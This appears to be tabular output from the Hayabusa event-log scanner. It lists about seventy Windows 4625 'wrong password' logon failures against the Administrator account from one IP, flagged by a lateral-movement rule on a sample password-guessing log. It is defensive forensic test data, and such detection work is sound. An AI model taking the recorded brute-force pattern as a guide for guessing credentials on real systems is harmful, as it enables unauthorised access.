| 1146 | 2016-09-20 01:50:28.889 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1147 | 2016-09-20 01:50:28.940 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1148 | 2016-09-20 01:50:28.990 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1149 | 2016-09-20 01:50:29.037 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1150 | 2016-09-20 01:50:29.077 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1151 | 2016-09-20 01:50:29.119 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1152 | 2016-09-20 01:50:29.164 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1153 | 2016-09-20 01:50:29.208 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1154 | 2016-09-20 01:50:29.251 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1155 | 2016-09-20 01:50:29.292 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1156 | 2016-09-20 01:50:29.336 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1157 | 2016-09-20 01:50:29.377 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1158 | 2016-09-20 01:50:29.411 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1159 | 2016-09-20 01:50:29.449 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1160 | 2016-09-20 01:50:29.487 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1161 | 2016-09-20 01:50:29.525 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1162 | 2016-09-20 01:50:29.555 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1163 | 2016-09-20 01:50:29.593 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1164 | 2016-09-20 01:50:29.629 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1165 | 2016-09-20 01:50:29.668 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1166 | 2016-09-20 01:50:29.704 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1167 | 2016-09-20 01:50:29.743 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1168 | 2016-09-20 01:50:29.781 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1169 | 2016-09-20 01:50:29.824 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1170 | 2016-09-20 01:50:29.864 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1171 | 2016-09-20 01:50:29.900 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1172 | 2016-09-20 01:50:29.940 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1173 | 2016-09-20 01:50:29.980 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1174 | 2016-09-20 01:50:30.012 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1175 | 2016-09-20 01:50:30.060 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1176 | 2016-09-20 01:50:30.106 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1177 | 2016-09-20 01:50:30.143 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1178 | 2016-09-20 01:50:30.190 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1179 | 2016-09-20 01:50:30.280 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1180 | 2016-09-20 01:50:30.325 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1181 | 2016-09-20 01:50:30.372 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1182 | 2016-09-20 01:50:30.411 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1183 | 2016-09-20 01:50:30.449 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1184 | 2016-09-20 01:50:30.504 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1185 | 2016-09-20 01:50:30.547 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1186 | 2016-09-20 01:50:30.584 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1187 | 2016-09-20 01:50:30.627 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1188 | 2016-09-20 01:50:30.668 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1189 | 2016-09-20 01:50:30.704 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1190 | 2016-09-20 01:50:30.742 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1191 | 2016-09-20 01:50:30.769 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1192 | 2016-09-20 01:50:30.816 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1193 | 2016-09-20 01:50:30.852 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1194 | 2016-09-20 01:50:30.881 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1195 | 2016-09-20 01:50:30.927 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1196 | 2016-09-20 01:50:30.977 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1197 | 2016-09-20 01:50:31.016 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1198 | 2016-09-20 01:50:31.060 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1199 | 2016-09-20 01:50:31.110 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1200 | 2016-09-20 01:50:31.148 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1201 | 2016-09-20 01:50:31.209 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1202 | 2016-09-20 01:50:31.248 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1203 | 2016-09-20 01:50:31.292 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1204 | 2016-09-20 01:50:31.336 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1205 | 2016-09-20 01:50:31.369 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1206 | 2016-09-20 01:50:31.421 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1207 | 2016-09-20 01:50:31.454 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1208 | 2016-09-20 01:50:31.511 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1209 | 2016-09-20 01:50:31.557 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1210 | 2016-09-20 01:50:31.596 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1211 | 2016-09-20 01:50:31.648 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1212 | 2016-09-20 01:50:31.688 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1213 | 2016-09-20 01:50:31.718 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1214 | 2016-09-20 01:50:31.762 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1215 | 2016-09-20 01:50:31.901 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
